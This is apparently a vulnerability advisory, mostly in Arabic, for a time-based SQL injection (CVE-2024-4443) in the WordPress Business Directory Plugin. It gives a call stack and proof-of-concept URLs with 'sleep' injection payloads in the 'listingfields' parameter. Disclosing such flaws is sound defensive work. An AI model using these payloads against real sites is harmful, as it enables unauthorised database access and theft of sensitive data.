
CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - حقن SQL غير مصادق عليه عبر معلمة listingfields
CVE-2024-4443 Business Directory Plugin – Easy Listing Directories for WordPress <= 6.4.2 - حقن SQL غير مصادق عليه عبر معامل listingfields
الوصف
إضافة Business Directory Plugin – Easy Listing Directories for WordPress لووردبريس معرضة لحقن SQL المعتمد على الوقت عبر معامل 'listingfields' في جميع الإصدارات حتى 6.4.2، وذلك بسبب عدم كفاية الهروب في المعامل المقدم من المستخدم ونقص الإعداد الكافي في استعلام SQL الموجود. وهذا يسمح للمهاجمين غير المصادق عليهم بإلحاق استعلامات SQL إضافية إلى الاستعلامات الموجودة التي يمكن استخدامها لاستخراج معلومات حساسة من قاعدة البيانات.
استدعاء الدوال
WPBDP__Listing_Search->execute (\business-directory-plugin\includes\helpers\class-listing-search.php:88)
WPBDP__Listing_Search->_traverse_tree (\business-directory-plugin\includes\helpers\class-listing-search.php:185)
WPBDP__Listing_Search->__construct (\business-directory-plugin\includes\helpers\class-listing-search.php:35)
WPBDP__Listing_Search::parse_request (\business-directory-plugin\includes\helpers\class-listing-search.php:214)
WPBDP__Listing_Search::from_request (\business-directory-plugin\includes\helpers\class-listing-search.php:210)
WPBDP__Views__Search->dispatch (\business-directory-plugin\includes\controllers\pages\class-search.php:54)
Poc
الرابط: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[{{Injection payload}}][1]=
الرابط العادي: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[1]=

الرابط paload false: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=0,5,0))+))--+-][1]=

الرابط paload true: <Host>/business-directory/?dosrch=1&q=&wpbdp_view=search&listingfields[+or+sleep(if(1=1,5,0))+))--+-][1]=
